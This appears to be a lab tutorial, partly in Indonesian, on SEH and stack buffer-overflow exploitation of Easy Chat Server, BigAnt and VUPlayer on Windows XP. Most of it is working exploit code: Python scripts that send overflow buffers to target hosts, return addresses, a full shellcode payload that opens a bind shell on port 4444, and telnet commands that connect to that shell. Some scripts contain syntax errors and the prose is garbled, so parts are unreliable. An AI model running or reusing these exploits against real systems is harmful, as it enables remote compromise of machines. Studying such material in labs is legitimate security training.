EXPLOIT EASY CHAT SERVER WITH SEH BASED

Ok now we will discuss how to exploit easy chat to use Seh
First make sure the easy chat server is installed in windows XP3 then try running application easy server chat

selanjutnya kita mencari informasi untuk mendapat kan vulener dengan menggunakan wireshark




After we get our selanjutna vulner fuzzer created as shown below

 #!/usr/bin/python
import socket
buf = "\x41" * 10000
buffer= "GET /chat.ghp?username="+buf+"&password=ywd&room=1&sex=0 HTTP/1.1\r\n\r\n"
buffer+= "Host: 192.168.43.2\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.2',80))
s.send(buffer + "\r\n\r\n")
s.close()


Next try to running easy chat server, start service and running ollydbg

  
Open Seh chain how click menu view and select seh chain




Press Shift + F9



Select the third row in the stack, right click and select follow dump








Next step select modul and copy to batract here I using modul Wininet.dll 

double click and ctrl + F 


Click find








And then try the module that we use in this way under this



Next we create a string in a way
And try running easy and ollydbg

 Value EIP change
 
And now we decide on how many bytes to EIP and stack hit
 
  
See above the value EIP = 220  and stack= 216
Next step Edit fuzzer
#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
RESULT
See above the value of EIP stricken X41
Next step edit fuzzer again

#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x34\x47\x00\x63"
buffer+="\x90"*(10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
  


And next Open new console 


And next open address to web browser and select payload


 And copy to fuzzer

#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xeb\x06\x90\x90"
buffer+="\x34\x47\x00\x63"
buffer+="\x90"*(10008-len(buffer))
buffer+="\x90" * 16
buffer+=("\x33\xc9\xd9\xcd\xb1\x51\xd9\x74\x24\xf4\xb8\xc5\xf9\x47\x64\x5e"
"\x83\xc6\x04\x31\x46\x11\x03\x83\xe8\xa5\x91\xf7\x61\xc1\x17\xef"
"\x8f\xea\x57\x10\x0f\x9e\xc4\xca\xf4\x2b\x51\x2e\x7e\x57\x5f\x36"
"\x81\x47\xd4\x89\x99\x1c\xb4\x35\x9b\xc9\x02\xbe\xaf\x86\x94\x2e"
"\xfe\x58\x0f\x02\x85\x99\x44\x5d\x47\xd3\xa8\x60\x85\x0f\x46\x59"
"\x5d\xf4\x8f\xe8\xb8\x7f\x90\x36\x42\x6b\x49\xbd\x48\x20\x1d\x9e"
"\x4c\xb7\xca\x23\x41\x3c\x85\x4f\xbd\x5e\xf7\x4c\x8c\x85\x93\xd9"
"\xac\x09\xd7\x9d\x3e\xe1\x97\x01\x92\x7e\x17\x31\xb2\xe8\x16\x0f"
"\x44\x05\x76\x70\x8e\xb3\x24\xe8\x47\x0f\xf9\x9c\xe0\x1c\xcf\x03"
"\x5b\x1c\xff\xd3\xa8\x0f\xfc\x18\x7f\x2f\x2b\x01\xf6\x2a\xb2\x3c"
"\xe5\xbd\x39\x6b\x9c\xbf\xc2\x43\x08\x19\x35\x96\x64\xce\xb9\x8e"
"\x24\xa2\x16\x7d\x98\x07\xca\xc2\x4d\x77\x3c\xa2\x19\x96\xe1\x4c"
"\x89\x11\xf8\x05\x45\x86\xe1\x55\x51\x91\xea\x43\x37\x0e\x44\x3e"
"\x37\xfe\x0e\x64\x6a\xd1\x27\x33\x8a\xf8\xeb\xee\x8b\xd5\x64\xf5"
"\x3d\x50\x3d\xa2\x42\x8a\xee\x18\xe9\x66\xf0\x70\x82\xe1\xe9\x09"
"\x63\x88\xa2\x16\xbd\x3e\xb2\x38\x24\xab\x28\xde\xc1\x48\xdc\x97"
"\xf7\xe5\x4e\xfe\xde\x35\xe7\xe7\x4b\x82\x71\x05\xba\xca\x71\x63"
"\x43\x88\x58\x8d\xfe\x21\x30\xfc\x85\x01\x9d\x55\xd2\x1a\x93\x57"
"\x96\xcd\xac\xd2\x9d\x0e\x84\x47\x49\xa3\x78\x26\x24\x29\x7a\x99"
"\x97\xf8\x2d\xe6\xc8\x6b\x63\xc1\xec\xa5\x28\x0e\x38\x53\x30\x0f"
"\xf2\x5b\x1e\x64\xaa\x5f\x1c\xbe\x31\x5f\xf5\x6c\x45\x4f\x92\xee"
"\x61\x92\x10\x5d\x6d\x85\x28\xb1")
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()




And now type command telnet 192.168.56.101 4444 (enter)






And see what happened to the easy chat



 "GOOD LUCK"





EXPLOIT BIGANT WITH SEH BASED

Ok now i will explain how to exploit BigAnt using SEH based exploit
The first install Bigant at windows Xp3, After that run BigAnt and run service control.





The next step we create a fuzzer as below:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port = 6660
buffer = "USV " 

buffer+="\x41" * 2500
buffer+="\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

 

Next we try to send data buffer 2500 and the result


Picture above shows aflikasi been experiencing crashes, then we click view select SEH chain :


Next push shift+ F9 for running and  EIP value change

 
It was a sign that we send buffer has been entered in seh chain, t
hen right click on the third line in the stack and select follow dump

Hereinafter we go into safe seh we must first learn more about safe seh as described in the book in the operating system is Windows XP SP2 and Server 2003, Microsoft made the new security for the use of exception handler is called safe seh. generally safe seh just a linker that can be used when compiling an application in windows system.

Ok after we know seh safe then we go into practice :
Our first copies vbajet32.dll file that is installed on the windows and save dibatrack a shared feature in virtualbox, and save file to /tmp

Then we open a new console and type the command like this :
#cd /pentest/exploits/framwork (enter)
#./msfpescan -i /tmp/vbajet32.dll | grep DllCharacteristics



The next step we open OllyDbg and select view-> executable modules-> will appear as below:





Then double click the file vbajet32.dll

After entry into the windows of the file vbajet32.dll cpu then right click select search for-> sequence of commands or Ctr + S and type comand POP R32, R32 POP, RETN


Click find

From the picture above we see OllyDbg have found vbajet32.dll address in memory.

Then looking at the byte in the buffer keberapa ter overwrite stack addresses how to use tools pattern_create.rb 2500 (enter)

Then copy the string that you created into the fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port = 6660
buffer = "USV "
buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"+"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
 


After that we see how the same result as before

Push shift+F9 see the result



After that use a command as below




Next edit fuzzer
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port = 6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xCC\xCC\xCC\xCC"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
 

And running ollydbg, Bigant to the result .
Edit Fuzzer again

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port = 6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xCC\xCC\xCC\xCC"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
 

The result


Push shift+f9


Next step select line first to stack and right click select follow in dump




Next step create payload his manner similar to the previous step


after payload we can directly copy and input into the fuzzer




And type command telnet 192.168.56.101 4444



BUFFER OVERPLOW EXPLOIT VUPLAYERS

OK before we get into the first topic of discussion that we know the menus are in the VUPlayer, In the file there is a menu as shown below :


Next in the view as shown below :





Next in the visual as show below : 


Ok now we try to plug fuzzernya in the visual menu as we see drawn on how we get used to the place where aflikasi VUPlayer installed there we could see what I can get the menu to enter our fuzzer for detail have drawn below.
I previously had tried to get my Visual input to the menu to format fuzzer dsitu. etc. but the results were not satisfactory even in the menu on the visual missing one,,, hahahahaha

Well now I'll try to make the fuzzer as below 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x41" * 50000
cimon.write(buffer)
cimon.close()



Then we open it VUPlayer and select open Playlist


Then we select the folder where you save the fuzzer that we have made our opening ".m3u" and type command "python data.py" at console




See what happens when we open the file "crash.m3u" if it means missing VUPlayer, VUPlayer applications have been hit by fuzzer that we make.

Then we open OllyDbg and run VUPlayer we see the result 'A' which we enter into what it is yet

Picture above shows the value of EIP register are affected




#The next step we open a new console and type the command

     #cd /pentest/exploits/framwork/tools (enter)
     #./pattern_create.rb 50000 > string_pattern.txt (enter)
     #ls
     #kate string_pattern.txt (will appear as below)




#After string_pattern.txt appear we put copies da scrip fuzzer like this:


#When it's open OllyDbg as the previous step and see what happens
#Visible on its EIP register value has changed.


#The next step we find out the byte keberapa EIP and ESP register values ​​are affected to know we are typing the command as shown below. 


#From the above picture we see the location of the stored EIP and ESP dibyte to 1012 and 1016

#Next step we edit fuzzer 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\xDE\xFA\xDA\xBE"
cimon.write(buffer)
cimon.close()

 

#After that run olldbg and see what happens



#We see above the value of EIP register his change into BEDAFADE




#The next step we try to do the writing on the ESP is how we edit his first fuzzer and we will try to write the number 90 

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\xDE\xFA\xDA\xBE"
buffer+="\x90" * (1012-len(buffer)
buffer+="\x90" * (1016-len(buffer)
cimon.write(buffer)
cimon.close()

  
#To see the same steps as described above


#The next step to find the memory address that stores the JMP ESP command, to look for running the application using the JMP ESP Ollydbg on view menu select Executable modules
#Next select shell 32 dan ctr F and written JMP ESP






#Next Edit fuzzer



#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\x1E\xFA\xB3\x7C"
buffer+="\x90" * (1012-len(buffer)
buffer+="\x90" * (1016-len(buffer)
cimon.write(buffer)
cimon.close()

#Running Ollydbg and see result


#Now we are looking for how payload as shown below Now we are looking for how payload as shown below

#Next open web browser and this address input 127.0.0.1 : 55555


#Next select payload and select win 32 at filter modules


#Select windows blind shell and follow the steps below



#Next copy payload to fuzzer
#And next type command telnet 192.168.43.3 4444 and running ollydbg to see succes or not



                                     "<GOOD LUCK AND TRY HARDER>"